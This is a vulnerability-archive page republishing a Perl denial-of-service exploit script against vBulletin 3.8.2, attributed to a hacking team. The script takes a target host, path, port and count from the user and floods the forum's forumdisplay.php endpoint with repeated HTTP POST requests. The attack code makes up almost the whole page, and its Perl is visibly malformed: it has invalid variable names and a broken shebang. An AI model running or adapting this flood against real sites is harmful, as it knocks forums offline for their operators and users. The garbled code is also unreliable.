Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22470
HistorySep 15, 2009 - 12:00 a.m.

vBulletin 3.8.2 Denial of Service Exploit

2009-09-1500:00:00
vulners.com
88

#!usr/bin/perl
#vBulletin® Version 3.8.2 D3n14l 0f S3rv1c3 Expl01t
#HaCker Anger - [email protected]
########################################################################

Modules

########################################################################
use IO::SOCKET; # Object interface #
########################################################################
if (@ARGV<1){
print"
########################################################################

Author : Hacker Anger

TeaM : The Assassin Scorpion TeaM

Home : http://Baloma.NeT

Mail : [email protected]

########################################################################
########################################################################

##

##->vBulletin 3.8.2 Denial of Service Exploit<- ##
##

##

##Enter These Exploit ## ##
##1.Target ##[] www.Baloma.net ##
##2.Forum ##[
] vbulletin ##
##3.Exploit ##[] forumdisplay.php?f= ##
##4.Execution length/timeout ##[
] 7777777777777777 ##
##5.Port ##[] 80 ##
########################################################################
\a";}
$anger_Block = "
########################################################################";
$Hacker = "Error!Error!Error!Error";
$H-a =0;
print"$anger_Block\n";
print q(Target->);
chomp($H-zi3l =<STDIN>);
if ($H-zi3l eq""){
die "$Hacker\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Path->);
chomp($H4ck3r_4n93r =<STDIN>);
if ($H4ck3r_4n93r eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print "Vulnerability\n";
print"forumdisplay.php?f=\n";
print"->\n";
chomp($Exploit =<STDIN>);
if ($Exploit eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Time->);
chomp($H-flood =<STDIN>);
if ($H-flood eq "") {
die "$Hacker !\a\n";}
print"$anger_Block\n";
print"$anger_Block\n";
print q(Port->);
chomp($p0rt =<STDIN>);
if ($p0rt eq ""){
die "$Hacker \n";}
print"$anger_Block\n";
print q(Send "start"->);
chomp($H-start =<STDIN>);
if ($H-start eq "") {
die "$Hacker\n";}
print "$anger_Block\a\n";
print "[+]Check Data \n";
print "[
]Check Target : $H-zi3l\n";
print "[]Check Forum : $H4ck3r_4n93r\n";
print "[
]Checking Port : $p0rt\n";
print "$anger_Block\n";
if($H-start == 1){
while($H-a != 0000){
$H-a++;}
}elsif ($H-start == start){
while($H-a != $H-flood)
{
$4n93r_postit = "$H-zi3l"."$H4ck3r_4n93r"."$Exploit";
$4n93r_l = length $4n93r_postit;
$4n93r = new IO::Socket::INET (
PeerAddr => "$H-zi3l",
PeerPort => "$p0rt",
Proto => "tcp",
);

print $4n93r "POST $H4ck3r_4n93r$Exploit HTTP/1.1\n";
print $4n93r "Host: $H-zi3l\n";
print $4n93r "Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5\n";
print $4n93r "Referer: $H-zi3l\n";
print $4n93r "Accept-Language: en-us\n";
print $4n93r "Content-Type: application/x-www-form-urlencoded\n";
print $4n93r "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $4n93r "Content-Length: $4n93r_l\n\n";
print $4n93r "$4n93r_postit\n";
close($4n93r);
syswrite STDOUT, "->BLACKOUT<-";
$H-a++;
}
}else{
die "Error - can't connect to target $H-zi3l !\n";
}